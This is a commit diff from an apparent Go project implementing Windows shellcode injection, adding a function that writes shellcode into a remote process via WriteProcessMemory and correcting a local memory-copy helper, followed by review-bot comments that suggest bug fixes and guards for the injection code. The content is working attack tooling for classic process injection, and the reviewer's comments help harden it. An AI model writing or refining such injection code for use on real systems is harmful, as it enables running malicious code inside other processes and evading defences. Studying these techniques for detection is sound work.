
Commit 3bcc920

committed
Added CopyShellcodeToRemoteProcess()
1 parent d93e531 commit 3bcc920


2 files changed

+31
-10
lines changed


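--- a/Shellcode/calculator.go
+++ b/Shellcode/calculator.go
@@ -16,7 +16,7 @@ func ExecuteCalculator() {
 
 shellAddr, shellSrc := AllocateShellcode()
 
-CopyShellcodeToMemory(shellAddr, &shellSrc)
+CopyShellcodeToMemory(shellAddr, shellSrc)
 
 ChangeShellcodeMemoryToRX(&shellAddr, len(shellSrc))
 
@@ -46,17 +46,14 @@ func AllocateShellcode() (uintptr, []byte) {
 return shellAddr, shellCodeSrc
 }
 
-func CopyShellcodeToMemory(destAddr uintptr, shellCodeSrc *[]byte) {
-
+func CopyShellcodeToMemory(destAddr uintptr, shellCodeSrc []byte) {
+//RtlMoveMemory is for local process memory (not cross-process).
 procRtlMoveMemory := dll.NtDll.NewProc("RtlMoveMemory")
 
 procRtlMoveMemory.Call(
-
-uintptr(unsafe.Pointer(&destAddr)),
-// 1. Dereference Before Indexing
-// 2. Pointer to First Element
-uintptr(unsafe.Pointer(&(*shellCodeSrc)[0])),
-uintptr(len(*shellCodeSrc)))
+destAddr,
+uintptr(unsafe.Pointer(&(shellCodeSrc)[0])),
+uintptr(len(shellCodeSrc)))
 
 log.Printf("[+] Shellcode Wrote Done 0x[%v] \n", destAddr)
 }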
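Review bot: `CopyShellcodeToMemory` indexes `shellCodeSrc[0]` unconditionally, so a zero-length slice panics with an index-out-of-range before the call is made. A guard at the top of the function, `if len(shellCodeSrc) == 0 { return }`, would make that case explicit. The parentheses in `&(shellCodeSrc)[0]` are left over from the old pointer dereference and can be dropped: `&shellCodeSrc[0]`. The function also has no doc comment; one stating that `destAddr` must be a writable region of at least `len(shellCodeSrc)` bytes in the current process would record the precondition the new inline comment only hints at.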

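--- a/Shellcode/injection.go
+++ b/Shellcode/injection.go
@@ -35,7 +35,7 @@ func ClassicInjection() {
 
 log.Printf("[INJECT] Memory Allocation Done, Address: 0x(%x)", addr)
 
-CopyShellcodeToMemory(addr, &shellcode)
+CopyShellcodeToRemoteProcess(cmdHandle, shellcode, addr)
 
 log.Printf("[INJECT] Shellcode Moved To Process Memory \n")
 
@@ -45,6 +45,30 @@ func ClassicInjection() {
 
 }
 
+func CopyShellcodeToRemoteProcess(pHandle syscall.Handle, shellCode []byte, addr uintptr) {
+procWriteProcessMemory := dll.Kernel32.NewProc("WriteProcessMemory")
+
+var bytesWritten uintptr
+
+ret, _, lastErr := procWriteProcessMemory.Call(
+uintptr(pHandle),
+addr,
+uintptr(unsafe.Pointer(&shellCode[0])),
+uintptr(len(shellCode)),
+uintptr(unsafe.Pointer(&bytesWritten)),
+)
+if ret == 0 {
+log.Panicf("[INJECT] WriteProcessMemory() failed: %v", lastErr)
+}
+
+if bytesWritten != uintptr(len(shellCode)) {
+log.Panicf("[INJECT] Wrote %d/%d bytes", bytesWritten, len(shellCode))
+}
+
+log.Printf("[INJECT] Shellcode written to 0x%x \n", shellCode)
+
+}
+
 func ChangeRemoteProcessPermission(pHandle windows.Handle, addr uintptr, size int, newProtect uint32) {
 var oldProted uint32
 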
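Review bot: The final log line in `CopyShellcodeToRemoteProcess` passes `shellCode` to `%x`, so it prints the whole buffer as hex under a message that reads as an address; it should be `log.Printf("[INJECT] Shellcode written to 0x%x \n", addr)`. `&shellCode[0]` also panics on an empty slice before either failure check is reached, so a length check at the top of the function is missing. The new function takes `syscall.Handle` while `ChangeRemoteProcessPermission` directly below takes `windows.Handle`; a caller holding one of these types has to convert for the other, and settling on a single handle type for both helpers would be more consistent. The body of `ChangeRemoteProcessPermission` continues outside the hunk.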
